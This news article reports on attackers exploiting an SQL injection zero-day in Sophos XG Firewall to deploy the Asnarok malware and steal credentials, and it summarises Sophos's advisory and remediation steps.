Hackers are exploiting SQL injection zero-day flaw in Sophos XG Firewall

Hackers are exploiting SQL injection zero-day flaw in Sophos XG Firewall

Cyber-security firm Sophos has released an emergency security update to fix a zero-day vulnerability that has been exploited by hackers to drop malware on its XG Firewall devices.

The company said the attack on XG Firewall appliances was uncovered on April 22 after a suspicious field value was discovered in a device’s management interface. Further investigation revealed a previously unknown SQL injection vulnerability that led to remote code execution on some of Sophos’ firewall products.

According to the vendor, the coordinated attack conducted by an unknown threat actor targeted “systems configured with either the administration interface (HTTPS admin service) or the user portal exposed on the WAN zone” with an intention to steal sensitive information from the firewall.

“Customers with impacted firewalls should assume the data was compromised. The data exfiltrated for any impacted firewall includes all local usernames and hashed passwords of any local user accounts. For example, this includes local device admins, user portal accounts, and accounts used for remote access. Passwords associated with external authentication systems such as Active Directory (AD) or LDAP were not compromised,” the company said in its initial version of advisory.

In a subsequent report providing technical details about the attack Sophos said that the attacker exploited the SQL injection vulnerability to ins ert a one-line command in to the firewall database. This command caused affected devices to download a Linux shell script named Install.sh from a remote server. The script then executed more SQL commands and dropped more files onto the virtual file system.

“The Install.sh script, initially, ran a number of Postgres SQL commands to modify or zero out the values of certain tables in the database, one of which normally displays the administrative IP address of the device itself. It appears that this was an attempt to conceal the attack, but it backfired: On some appliances, the shell script’s activity resulted in the attacker’s own injected SQL command line being displayed on the user interface of the firewall’s administrative panel. In place of what should have been an address, it showed a line of shell commands,” the vendor explained.

It appears the malware (which Sophos has dubbed Asnarok) used in the attack is capable of retrieving only firewall resident information such as the firewall’s license and serial number, a list of the email addresses of user accounts that were stored on the device, followed by the primary email belonging to the firewall’s administrator account, firewall users’ names, usernames, the encrypted form of the passwords, and the salted SHA256 hash of the administrator account’s password (passwords were not stored in plain text), and a list of the user IDs permitted to use the firewall for SSL VPN and accounts that were permitted to use a “clientless” VPN connection.

The company says customers whose firewalls have not been compromised do not need to take any action. Users who are informed that their firewalls have been targeted in this attack are recommended to take additional measures to remediate the issue, which involve resetting device administrator accounts and rebooting XG devices.

Back to the list

Latest Posts

AI chatbots fall for phishing scams

AI chatbots fall for phishing scams

The models provided the correct URL only 66% of the time; nearly 30% of responses pointed users to dead or suspended domains.
3 July 2025
Chinese hackers exploited Ivanti flaws in attacks against French government

Chinese hackers exploited Ivanti flaws in attacks against French government

ANSSI believes that the Houken campaign is operated by ‘UNC5174’, an entity believed to act as an initial access broker for China’s Ministry of State Security.
2 July 2025
Threat actors exploit Vercel's AI tool v0 to build sophisticated phishing pages

Threat actors exploit Vercel's AI tool v0 to build sophisticated phishing pages

The malicious actors used v0.dev to create fake login pages mimicking legitimate brands.
2 July 2025